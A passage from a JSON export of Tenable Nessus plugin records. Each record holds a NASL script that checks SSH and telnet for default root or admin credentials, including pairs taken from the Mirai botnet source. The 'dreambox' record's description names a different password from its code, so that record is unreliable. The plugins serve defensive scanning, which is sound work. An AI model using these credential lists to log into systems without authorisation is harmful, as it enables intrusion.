severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:08:03", "description": "The account 'mother' on the remote host has the default password 'f****r'. A remote attacker can exploit this issue to gain administrative access to the affected system.\n\nNote that this username / password combination was found in the leaked source from the Mirai botnet. The password has been masked in this description.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password 'f****r' for 'mother' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_MOTHER_FUCKER.NASL", "href": "https://www.tenable.com/plugins/nessus/94375", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"mother\";\npassword = \"fucker\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94375);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'f****r' for 'mother' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with a default password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'mother' on the remote host has the default password\n'f****r'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\n\nNote that this username / password combination was found in the leaked\nsource from the Mirai botnet. The password has been masked in this\ndescription.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://en.wikipedia.org/wiki/Mirai_(malware)\");\n # https://github.com/jgamblin/Mirai-Source-Code/blob/6a5941be681b839eeff8ece1de8b245bcd5ffb02/mirai/bot/scanner.c#L123\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?539c6e47\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:06:58", "description": "The account 'root' on the remote host has the default password 'realtek'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password 'realtek' for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_REALTEK.NASL", "href": "https://www.tenable.com/plugins/nessus/94396", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"realtek\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94396);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'realtek' for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the default password\n'realtek'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:09:30", "description": "The account 'admin' on the remote host has the default password 'P@ssw0rd'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-11-10T00:00:00", "type": "nessus", "title": "Default Password 'P@ssw0rd' for 'admin' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ADMIN_PASSW0RD.NASL", "href": "https://www.tenable.com/plugins/nessus/94670", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"admin\";\npassword = \"P@ssw0rd\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94670);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'P@ssw0rd' for 'admin' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'admin' on the remote host has the default password\n'P@ssw0rd'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:40:20", "description": "The account 'root' on the remote host has the password 'rootme'. An attacker may leverage this issue to gain total control of the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2008-10-01T00:00:00", "type": "nessus", "title": "Default Password (rootme) for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_ROOTME.NASL", "href": "https://www.tenable.com/plugins/nessus/34323", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"rootme\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34323);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (rootme) for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An account on the remote host uses a known default password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the password 'rootme'. An \nattacker may leverage this issue to gain total control of the affected \nsystem.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:06:27", "description": "The account 'root' on the remote host has the default password 'Zte521'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password 'Zte521' for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_ZTE521.NASL", "href": "https://www.tenable.com/plugins/nessus/94386", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"Zte521\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94386);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'Zte521' for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the default password\n'Zte521'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T14:11:31", "description": "The account 'root' on the remote host has the password 'TANDBERG'.\n\nAn attacker may leverage this issue to gain administrative access to the affected system.\n\nNote that Cisco TelePresence Conductor virtual appliances are known to use these credentials to provide complete, administrative access to the appliance.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-11-26T00:00:00", "type": "nessus", "title": "Default Password (TANDBERG) for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_TANDBERG.NASL", "href": "https://www.tenable.com/plugins/nessus/79583", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"TANDBERG\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79583);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (TANDBERG) for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default account.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the password 'TANDBERG'.\n\nAn attacker may leverage this issue to gain administrative access to\nthe affected system.\n\nNote that Cisco TelePresence Conductor virtual appliances are known to\nuse these credentials to provide complete, administrative access to\nthe appliance.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account or use ACLs to restrict access\nto the host.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"account_check.nasl\", \"telnetserver_detect_type_nd_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:06:59", "description": "The account 'root' on the remote host has the default password 'anko'.\nA remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password 'dreambox' for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_DREAMBOX.NASL", "href": "https://www.tenable.com/plugins/nessus/94388", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"dreambox\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94388);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'dreambox' for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the default password 'anko'.\nA remote attacker can exploit this issue to gain administrative access\nto the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T14:03:06", "description": "The account 'root' on the remote host has the password 'nas4free'.\n\nAn attacker may leverage this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-04-14T00:00:00", "type": "nessus", "title": "Default Password (nas4free) for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_NAS4FREE.NASL", "href": "https://www.tenable.com/plugins/nessus/73684", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\naccount = \"root\";\npassword = \"nas4free\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73684);\n script_version(\"1.8\");\n 